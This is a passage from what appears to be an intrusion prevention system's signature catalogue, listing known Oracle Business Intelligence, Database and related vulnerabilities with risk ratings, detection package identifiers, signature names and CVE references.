An XML external entity injection vulnerability exists in Oracle Business Intelligence Publisher Enterprise. The vulnerability is due to insufficient handling of XML external entities in the XDO service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could lead to the disclosure of file contents for any file readable by the target service.

Situation:

File-TextId_Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection

References:

CVE-2021-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2401

Oracle-Business-Intelligence-CVE-2021-2456-Insecure-Deserialization

About this vulnerability:

An attempt to exploit a vulnerability in Oracle Business Intelligence BIRemotingServlet AMF detected

Risk:

High

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Oracle Business Intelligence BIRemotingServlet AMF detected.

Situation:

HTTP_CRL-Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization

References:

CVE-2021-2456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2456

Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

Moderate

First detected in:

sgpkg-ips-490-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in Oracle Business Intelligence. The vulnerability is due to improper input sanitization while constructing an error message for sub-resources to /em/console/help/webapp/ An attacker could exploit this vulnerability by enticing a target using specific web browsers to follow a crafted link. Successful exploitation could result in arbitrary script code execution in the context of the Business Intelligence application.

Situation:

HTTP_CSU-Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting

References:

CVE-2012-1686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1686

BID-56026
http://www.securityfocus.com/bid/56026

OSVDB-86373
http://www.osvdb.org/86373

Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864

About this vulnerability:

An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

High

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Directory Traversal

Description:

A vulnerability in Oracle Business Intelligence Enterprise Edition may allow unauthenticated attackers to read arbitrary files.

Situation:

HTTP_CRL_Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864

References:

CVE-2020-14864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14864

Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616

About this vulnerability:

A vulnerability in Oracle Business Intelligence

Risk:

High

First detected in:

sgpkg-ips-1668-5242

Last changed:

sgpkg-ips-1668-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

An external entity injection vulnerability has been reported in the ReportTemplateService component of the Oracle BI Publisher (previously XML Publisher).

Situation:

File-Text_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
File-TextId_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616

References:

CVE-2019-2616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2616

Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure

About this vulnerability:

A vulnerability in Oracle Business Intelligence Mobile App Designer

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Business Intelligence Mobile App Designer

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in Oracle Business Intelligence Mobile App Designer. The vulnerability is due to insufficient input validation of certain parameters, which can allow an attacker to traverse the file system and access files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable application. Successful exploitation could result in the disclosure of arbitrary files.

Situation:

HTTP_CSU-Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure

References:

CVE-2014-4249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4249

BID-68605
http://www.securityfocus.com/bid/68605

OSVDB-109086
http://www.osvdb.org/109086

Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

Moderate

First detected in:

sgpkg-ips-1388-5242

Last changed:

sgpkg-ips-1388-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

A JNDI injection vulnerability exists in Oracle Business Intelligence Publisher. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection

References:

CVE-2021-2391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2391

Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

Moderate

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

Improper handling of requests causes a JNDI vulnerability in Oracle Business Intelligence Enterprise Edition. A successful exploit may allow an attacker to send arbitrary serialized objects to the target system to be executed.

Situation:

HTTP_CRL-Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection

References:

CVE-2021-2396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2396

Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition.

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1448-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

A vulnerability in Oracle Business Intelligence Enterprise Edition, versions 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0, and 5.5.0.0.0, which allows remote attackers to disclose file contents by sending crafted requests to the target server, due to the insufficient handling of XML external entities in the XDO service.

Situation:

Generic_TCP-Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
File-TextId_Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection

References:

CVE-2021-2400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2400

Oracle-Business-Intelligence-SQL-Injection

About this vulnerability:

Attempt to explot a vulnerability in Oracle Business Intelligence One

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Business Intelligence One

Type:

SQL Injection

Description:

Oracle Business Intelligence contains an SQL injection vulnerability. The vulnerability is due to improper input validation in the OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID procedure.

Situation:

TNS_Oracle-Oracle-Business-Intelligence-SQL-Injection

References:

CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799

BID-47431
http://www.securityfocus.com/bid/47431

OSVDB-71956
http://www.osvdb.org/71956

Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

Moderate

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

Improper input validation in the UploadFndDBCPage class causes a file upload vulnerability in Oracle Business Intelligence. A successful exploit allows an attacker to cause a denial of service condition or privilege escalation.

Situation:

HTTP_CS-Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload

References:

CVE-2021-2392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2392

Oracle-Business-Transaction-Management-Arbitrary-File-Creation

About this vulnerability:	A vulnerability in Oracle Business Transaction Management
Risk:	High
First detected in:	sgpkg-ips-469-5211
Last changed:	sgpkg-ips-1588-5242
Platform:	Generic
Software:	Oracle Business Transaction Management
Type:	Directory Traversal
Description:	There is a directory traversal vulnerability in Oracle Business Transaction Management Server. The vulnerability is due to insufficient validation of user input while processing SOAP requests sent to the FlashTunnelService web service. By specifying a writeToFile operation, remote, unauthenticated attackers can create arbitrary files on the server and execute arbitrary code from the uploaded file.
Situation:	HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Creation

Oracle-Business-Transaction-Management-Flashtunnel-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Oracle Business Transaction Management

Risk:

Moderate

First detected in:

sgpkg-ips-471-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Business Transaction Management

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in Oracle Business Transaction Management Server. The vulnerability is due to insufficient validation of user input while processing SOAP requests sent to the FlashTunnelService web service. By specifying a deleteFile operation, remote, unauthenticated attackers can remove arbitrary files on the server with System privileges. This can lead to a denial of service condition or can be used to assist further attacks.

Situation:

HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Deletion

References:

BID-54870
http://www.securityfocus.com/bid/54870

Oracle-Client-System-Analyzer-Arbitrary-File-Upload

About this vulnerability:

An Oracle Client System Analyzer Arbitrary File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server

Type:

Input Validation

Description:

A vulnerability in Oracle Database Client System Analyzer, versions 11.1.0.7 and 11.2.0.1, which allows remote attackers to upload arbitrary files by sending a NULL byte within a POST parameter during a request to this JSP script.

Situation:

HTTP_CRL-Oracle-Client-System-Analyzer-Arbitrary-File-Upload

References:

CVE-2010-3600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3600

BID-45883
http://www.securityfocus.com/bid/45883

OSVDB-70546
http://www.osvdb.org/70546

Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle Coherence

Risk:

High

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Oracle Coherence; Oracle WebLogic Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Oracle Coherence. This vulnerability is due to a lack of deserialization filtering when Coherence ExternalizableLite classes are deserialized. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted T3 or IIOP request to a WebLogic server running a vulnerable version of Coherence. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.

Situation:

Generic_CS-Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization

References:

CVE-2020-14756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14756

Oracle-Create-Database-Link-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	Moderate
First detected in:	sgpkg-ips-356-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Database Server
Type:	Buffer Overflow
Description:	There is a vulnerability in Oracle database products. A specially crafted Connect String parameter, specified in the Create Database Link command, could trigger buffer overflow in the database server process. A remote attacker can use this vulnerability to create a denial-of-service condition affecting the entire database. Note that an attacker must be able to login as a user with certain privileges to trigger this vulnerability. In a simple attack case, the vulnerable service drops all active connections. The service continues to accept connections to the Oracle server. However, because of memory corruption, user authentication always fails, even with valid user credentials. Therefore, a denial of service condition exists until the service is restarted. In a more sophisticated attack case, this vulnerability may be exploited for code execution. In this case, the behaviour of the attack target is dependent on the code injected. On Unix-like systems, the service runs as the 'oracle' user which does not have full system privileges. On Windows, the service runs as local system which does have full system privileges. Therefore, the privilege level that injected code is executed with is dependent on the operating system that the vulnerable Oracle server is running on.
Situation:	Generic_CS-Oracle-Create-Database-Link-Buffer-Overflow TNS_CS-Oracle-Create-Database-Link-Buffer-Overflow

Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-590-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscForms.DateTimeWrapper ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

File-Text_Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference

References:

CVE-2014-2416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2416

OSVDB-105819
http://www.osvdb.org/105819

Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator

Risk:

High

First detected in:

sgpkg-ips-593-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscXB.XB ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

File-Text_Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference

References:

CVE-2014-2417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2417

OSVDB-105820
http://www.osvdb.org/105820

Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Deref

About this vulnerability:

A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscTools.FileChooserDlg ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

File-Text_Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Dereference

References:

CVE-2014-2418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2418

OSVDB-105822
http://www.osvdb.org/105822

Oracle-Data-Quality-Loaderwizard-Datapreview-Type-Confusion

About this vulnerability:	A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk:	Moderate
First detected in:	sgpkg-ips-636-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Data Profiling and Data Quality for Data Integrator
Type:	Input Validation
Description:	A remote code execution vulnerability has been reported in Oracle Data Quality LoaderWizard DataPreview method contained in the TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to type confusion when handling data passed to it. A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.
Situation:	File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities

Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.TransformerTools.PostcardPreviewInt ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

File-Text_Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference

References:

CVE-2014-2415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2415

OSVDB-105821
http://www.osvdb.org/105821

Oracle-Data-Quality-Trillium-Based-Setbasicpreviewdata-Type-Confusion

About this vulnerability:

A vulnerability in Oracle Oracle Data Profiling and Data Quality for Data Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Quality TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to a type confusion when handling data passed to SetBasicPreviewData(). A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.

Situation:

File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities

References:

CVE-2015-4759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4759

Oracle-Data-Quality-Trillium-Based-Setentities-Type-Confusion

About this vulnerability:

A vulnerability in Oracle Oracle Data Profiling and Data Quality for Data Integrator

Risk:

Moderate

First detected in:

sgpkg-ips-667-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Data Profiling and Data Quality for Data Integrator

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Oracle Data Quality TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to a type confusion when handling data passed to SetEntities(). A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.

Situation:

File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities

References:

CVE-2015-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0444

Oracle-Database-Application-Express-Password-Hash-Disclosure

About this vulnerability:

A password has disclosure vulnerability in Oracle APEX

Risk:

Moderate

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle APEX; Oracle 11g

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Oracle Database Application Express (APEX). The vulnerability may allow a remote authenticated attacker to obtain access to password hashes via certain database views. A successful attack attempt will result in disclosure of sensitive information.

Situation:

HTTP_CRL-Oracle-Database-Application-Express-Password-Hash-Disclosure

References:

CVE-2009-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0981

BID-34461
http://www.securityfocus.com/bid/34461

OSVDB-53738
http://www.osvdb.org/53738

Oracle-Database-Core-Rdbms-Component-Denial-Of-Service

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i; Oracle 10g

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the Oracle Database Server. The vulnerability is due to an error in Core RDBMS Component when handling an invalid TNS data packet. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted TNS packet. Successful exploitation of the vulnerability would cause complete CPU usage which results in a denial of service condition. In a successful attack case, the target host gets a CPU usage of 100% which results in a denial of service condition. Normal operation cab be restored by stopping and restarting the affected process.

Situation:

TNS_CS-Oracle-Database-Core-Rdbms-Component-Denial-Of-Service

References:

CVE-2007-5530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5530

BID-26108
http://www.securityfocus.com/bid/26108

Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Database

Risk:

Moderate

First detected in:

sgpkg-ips-423-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Oracle's Database server. The vulnerability is due to the way in which parameters are handled by the TABLEFUNC_ASOWN function in the CTXSYS.DRVDISP package. A remote, authenticated attacker could exploit this vulnerability to execute arbitrary code on the target server, in the security context of the Oracle Database service, normally SYSTEM on Windows platforms and an unprivileged user on Unix platforms.

Situation:

TNS_CS-Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow

References:

CVE-2011-2301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2301

OSVDB-76520
http://www.osvdb.org/76520

Oracle-Database-DBMS-AQADM-Sys-Package-Grant-Type-Access-Procedure-SQL-Injection

About this vulnerability:

SQL Injection vulnerability allows priviledge escalation

Risk:

Moderate

First detected in:

sgpkg-ips-219-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

SQL Injection

Description:

An SQL injection vulnerability exists in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to the GRANT_TYPE_ACCESS function within the DBMS_AQADM_SYS Package. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute SQL code within the security context of the database administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.

Situation:

TNS_Oracle-Database-DBMS-AQADM-Sys-SQL-Injection

References:

CVE-2009-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0977

BID-34461
http://www.securityfocus.com/bid/34461

Oracle-Database-DBMS-Assert-Filter-Bypass

About this vulnerability:

SQL injection vulnerability in the Oracle Database Server dbms_assert package

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in the Oracle Database Server dbms_assert package. An authenticated attacker can execute arbitrary SQL code with elevated privileges.

Situation:

SMB-TCP_Oracle-Database-DBMS-Assert-Filter-Bypass
Generic_Oracle-Database-DBMS-Assert-Filter-Bypass
TNS_Oracle-Database-DBMS-Assert-Filter-Bypass

References:

CVE-2006-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5340

BID-19203
http://www.securityfocus.com/bid/19203

Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

About this vulnerability:

Oracle Database Server DBMS_EXPORT_EXTENSION package privilege escalation vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i; Oracle 9i; Oracle 10g

Type:

Malfunction

Description:

Oracle Database server does not enforce privileges properly in the built-in package DBMS_EXPORT_EXTENSION. An attacker with basic privileges can create a package which implements the ODCIIndexGetMetadata function. The function will be executed with sysdba privileges, which allows every possible operation to be performed. Also the function ODCIIndexUtilGetTableNames has a similar vulnerability.

Situation:

SMB-TCP_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Generic_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
TNS_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

References:

BID-17590
http://www.securityfocus.com/bid/17590

Oracle-Database-DBMS-Scheduler-Privilege-Escalation

About this vulnerability:

A vulnerability in Oracle Application Server

Risk:

Moderate

First detected in:

sgpkg-ips-356-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Server; Oracle Database Server

Type:

Buffer Overflow

Description:

There exists a vulnerability in the Oracle Database Server product. The vulnerability is caused by a flaw in the DBMS_Scheduler package bundled with database installation. An attacker with limited privileges may exploit this vulnerability to gain escalated privileges. Successfully exploiting this vulnerability changes the value of SESSION_USER environment variable to SYS. This will only affect the behaviour of the code which uses this variable to detect the name of the current user. For example, if table policies are set up using the SESSION_USER variable by employing VPD then it may be possible to overcome these policies by exploiting this vulnerability. The general database privileges of the user are not affected.

Situation:

Generic_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation
TNS_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation

References:

CVE-2005-1496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1496

BID-13509
http://www.securityfocus.com/bid/13509

Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service

About this vulnerability:

Oracle Database DBMS TNS Listener Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-219-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

Malfunction

Description:

A denial of service vulnerability exists in the Oracle Database Server. The vulnerability is due to an input validation error in the TNS Listener component when handling an invalid TNS data packet. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted TNS packet. As a result of processing the malicious packet, the server process will terminate resulting in the Denial of Service condition. In a successful attack case, the Listener component process on the server will terminate resulting in the Denial of Service condition. Normal operation can be restored by restarting the affected process.

Situation:

TNS_Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service

References:

CVE-2009-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0991

BID-34461
http://www.securityfocus.com/bid/34461

OSVDB-53737
http://www.osvdb.org/53737

Oracle-Database-DBMS_Java.Set_Output_To_Java-Privilege-Escalation

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	High
First detected in:	sgpkg-ips-285-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle 11g
Type:	Malfunction
Description:	A vulnerability exists in Oracle Database 11g server that could allow users with limited privileges to execute SQL commands with SYS privileges on the server. The vulnerability is due to an access control weakness that allows non-privileged users to execute methods in the DBMS_JAVA package. Remote authenticated users with only CREATE_SESSION privileges can exploit this vulnerability via the SET_OUTPUT_TO_JAVA method and execute arbitrary SQL commands on the target server.
Situation:	TNS_CS-Oracle-Database-DBMS-Java.Set-Output-To-Java-Privilege-Escalation

Oracle-Database-DBMS_JVM_EXP_PERMS-System-Command-Execution

About this vulnerability:

Privilege escalation vulnerability in Oracle Database server

Risk:

High

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Database

Type:

Malfunction

Description:

There is a privilege escalation vulnerability in Oracle Database server. A remote authenticated attacker with CREATE_SESSION privileges can exploit this vulnerability to execute arbitrary OS commands on a target server.

Situation:

Generic_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution
TNS_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution

References:

BID-38115
http://www.securityfocus.com/bid/38115

Oracle-Database-DBMS_Snap_Internal-Package-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g; Oracle 9i

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Oracle Database Server. The flaw is due to a boundary error within the DBMS_SNAP_INTERNAL package of the product. A remote authenticated attacker can exploit this vulnerability by sending an overly long input to the affected package and cause a buffer overflow. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process, usually System/root.

Situation:

Generic_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow
TNS_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow

References:

CVE-2007-2170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2170

BID-23532
http://www.securityfocus.com/bid/23532

OSVDB-39958
http://www.osvdb.org/39958

Oracle-Database-InterMedia-DoS

About this vulnerability:

A vulnerability in Oracle Database

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Database Server

Type:

Input Validation

Description:

A vulnerability exists in the Oracle Database Server's InterMedia system. This issue is caused by insufficient sanitization of user-supplied data in SQL statements. An attacker with limited privileges may exploit this vulnerability to create a denial of service condition on a vulnerable Oracle Database Server.

Situation:

Generic_CS-Oracle-Database-InterMedia-DoS

References:

BID-13239
http://www.securityfocus.com/bid/13239

Oracle-Database-REPCAT_RPC.VALIDATE_REMOTE_RC-SQL-Injection

About this vulnerability:

SQL injection vulnerability in Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-241-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Database

Type:

Input Validation

Description:

There is an SQL injection vulnerability in the Oracle Database Server DBMS_REPCAT_RPC package. A remote attacker with the Create Session privileges can exploit this vulnerability to inject and execute arbitrary SQL commands with elevated privileges of the SYS user. As a result, an attacker may disclose sensitive data and compromise data integrity.

Situation:

Generic_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection
TNS_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection

References:

CVE-2009-1021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1021

BID-35685
http://www.securityfocus.com/bid/35685

OSVDB-55886
http://www.osvdb.org/55886

Oracle-Database-Server-Access-Control-Bypass

About this vulnerability:

Access control bypass vulnerability in the Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-56-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

SQL Injection

Description:

Oracle database products have a privilege escalation vulnerability. An authenticated user is able to execute SQL statements using the AUTH_ALTER_SESSION variable. These SQL statements are executed in the context of the SYS user.

Situation:

TNS_Oracle-Database-Server-Access-Control-Bypass

References:

BID-16287
http://www.securityfocus.com/bid/16287

Oracle-Database-Server-Authentication-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Oracle Database Servers login functionality

Risk:

Moderate

First detected in:

